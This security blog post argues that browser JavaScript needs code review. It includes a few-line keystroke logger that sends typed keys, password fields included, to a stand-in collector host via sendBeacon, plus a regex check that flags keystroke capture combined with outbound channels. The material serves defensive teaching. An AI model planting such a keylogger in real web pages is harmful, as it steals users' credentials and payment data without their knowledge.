Code Review Required for JavaScript Too

In the course of my professional activity, I have repeatedly bumped into well-meaning individuals (developers, architects, leaders, and more) who believe that browser-hosted JavaScript is not a real security concern (anything important to protecting our systems and data happens back on the servers, right?). That belief can lead to a certain amount of passivity during the code reviews that gate promotion of code toward production.

I was just looking for a current copy of the Automated Penetration Testing Toolkit (APT2), happened to glance at one of the author’s blogs, and was presented with another reason that JavaScript code review, and the risk management that accompanies it, is still a core capability.

Much of the automated web application testing that I see day to day does a great job finding bugs: injection, broken access control, the usual vulnerability classes that scanners are built to recognize. It does not, though, do such a great job identifying new “features” that require only a little code to implement and that look, to a scanner, like ordinary application logic.

Professional pen tester Adam Compton offers a keystroke-logging JavaScript snippet along with a primitive way to catch & log its output. Adding a keystroke-logging “feature” to one of your JavaScript modules could involve only a few lines of code, yet it could enable any number of abuse cases (credentials, card numbers, and anything else typed into the page), with harm of varying scope & impact. Monitoring for “feature” additions of this kind in your JavaScript is just another reason to keep that language on your code review radar.
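To make the point concrete, here is an added example (written for this page, not code from the original post or from Adam Compton’s tool) of how little code such a “feature” takes, next to a crude review-time check that flags a JavaScript file combining keystroke capture with an outbound channel. The collector URL, the snippets and the pattern lists are all constructed for illustration; the check is a triage hint for a human reviewer, not a scanner.

```javascript
// Part 1: a few-line keystroke-logging "feature" as it might be slipped into a
// browser module. Kept as a string so this file runs under Node without a DOM.
// The collector endpoint is hypothetical.
const KEYLOGGER_SNIPPET = `
document.addEventListener('keydown', function (e) {
  // collect every keystroke, including those typed into password fields
  window.__kl = (window.__kl || '') + e.key;
  if (window.__kl.length > 32) {
    // ship it out in small chunks so it blends in with ordinary traffic
    navigator.sendBeacon('https://collector.example/log', window.__kl);
    window.__kl = '';
  }
});
`;

// A benign module for comparison: listens for keys but never sends them anywhere.
const BENIGN_SNIPPET = `
document.addEventListener('keydown', function (e) {
  if (e.key === 'Escape') { closeModal(); }
});
`;

// Part 2: what a reviewer (or a pre-commit hook) might look for.
// Keystroke capture on its own is normal UI code; capture plus an outbound
// channel in the same file is the combination worth a second look.
const CAPTURE_PATTERNS = [
  /addEventListener\s*\(\s*['"]key(down|press|up)['"]/,
  /\.onkey(down|press|up)\s*=/,
];
const EXFIL_PATTERNS = [
  /navigator\.sendBeacon\s*\(/,
  /\bfetch\s*\(/,
  /XMLHttpRequest/,
  /new\s+Image\s*\(/,      // classic image-beacon exfiltration
  /new\s+WebSocket\s*\(/,
];

// Returns which capture and exfil patterns matched, and whether both did.
function reviewJsSource(source) {
  const capture = CAPTURE_PATTERNS.filter((p) => p.test(source)).map((p) => p.source);
  const exfil = EXFIL_PATTERNS.filter((p) => p.test(source)).map((p) => p.source);
  return { suspicious: capture.length > 0 && exfil.length > 0, capture, exfil };
}

// Stand-alone run: show the verdict for both constructed snippets.
for (const [name, src] of [['keylogger', KEYLOGGER_SNIPPET], ['benign', BENIGN_SNIPPET]]) {
  const verdict = reviewJsSource(src);
  console.log(name, verdict.suspicious ? 'REVIEW: capture + exfil' : 'ok', verdict);
}
```

The check is deliberately coarse: a real exfiltration path can be hidden behind a wrapper function, a dynamically built URL, or an obfuscated string, which is exactly why the human reviewer, not the pattern list, is the control this post argues for.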

REFERENCES:

Automated Penetration Testing Toolkit (APT2)
https://github.com/MooseDojo/apt2

New Script/Tool: KeyLogging in JavaScript
http://blog.seedsofepiphany.com/2015/04/new-scripttool-keylogging-in-javascript.html
